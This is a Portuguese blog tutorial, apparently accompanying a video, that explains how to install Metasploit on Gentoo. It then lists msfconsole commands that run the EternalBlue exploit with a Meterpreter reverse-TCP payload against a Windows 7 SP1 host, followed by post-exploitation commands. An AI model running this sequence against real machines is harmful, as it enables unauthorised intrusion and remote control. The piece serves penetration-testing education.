O Metasploit é um projeto de segurança da informação que fornece informações sobre vulnerabilidades de segurança e ajuda nos testes de penetração .
É de propriedade da empresa de segurança Rapid7 , de Boston, Massachusetts que possui diversos softwares ( Opcode - Banco de Dados ; e o Shellcode , que executa comandos de Shell Script, … ), entre eles o mais conhecido que é o Metasploit Framework, um software de código aberto uma ferramenta para explorar falhas de uma máquina remota.
O Metasploit possui 6 tipos de módulos (auxiliary, exploit, payload, post, encoder e nop) . No vídeo apresentado por nós vamos utilizar o Meterpreter que é um payload avançado.
Existem diversas maneiras de você instalar o Metasploit Framework . Baixando diretamente pelo site https://www.metasploit.com/ ou pelo GitHub https://github.com/rapid7/metasploit-framework . Ou instalando via gerenciador de pacotes da sua distribuição, por exemplo, na distribuição que eu utilizo Gentoo basta realizar os comandos abaixo:
# su ou sudo
emerge -a net-analyzer/metasploit \
dev-ruby/metasploit_payloads-mettle \
dev-ruby/metasploit_data_models \
dev-ruby/metasploit-payloads \
dev-ruby/metasploit-model \
dev-ruby/metasploit-credential \
dev-ruby/metasploit-concern \
app-eselect/eselect-metasploit
O comando acima irá pedir para atualizar o package.use por conta das flags, então rode o comando:
etc-update --automode -5
E então rode o comando de instalação novamente.
Após instalação, talvez você não encontre o comando msfconsole
responsável por abrir o Metasploit, então crie um link simbólico com o root ou sudo, com o comando abaixo:
ln -s /usr/lib64/metasploit4.17/msfconsole /usr/bin/msfconsole
E pronto, o Metasploit está pronto para uso! Lembrando que em algumas distribuições já possuem o Metasploit instalado por padrão, como o Pentoo e o Kali Linux entre outras criadas especialmente para testes de invasão.
Próximo passo é rodar o Metasploit rodando o comando:
msfconsole
Isso irá abrir o framework, e em seguida usaremos o Meterpreter para acessar o Windows , basta rodar os comandos abaixo na ordem:
use exploit/windows/smb/ms17_010_eternalblue
set RHOST NÚMERO_IP_DA_MÁQUINA_WINDOWS
set payload windows/x64/meterpreter/reverse_tcp
set LHOST NÚMERO_IP_DA_SUA_MÁQUINA
set encoder generic/none
exploit
Lembrando que esses comandos são a grosso modo e servem para Windows 7 Service Pack 1 , para outras versões assista o vídeo com link abaixo que há mais detalhes para variados casos:
Após acessar você pode obter informações detalhadas do sistema com o comando sysinfo
; tirar um print da tela com o comando screenshot
; saber qual diretório você está com o comando pwd
a saída será algo do tipo *c:\windows\system32* ; desligar, reiniciar,… entre vários comando que podem ser consultado pelo comando help
.
Esse artigo e o vídeo apresentado foram criados com finalidade didática.
Comente!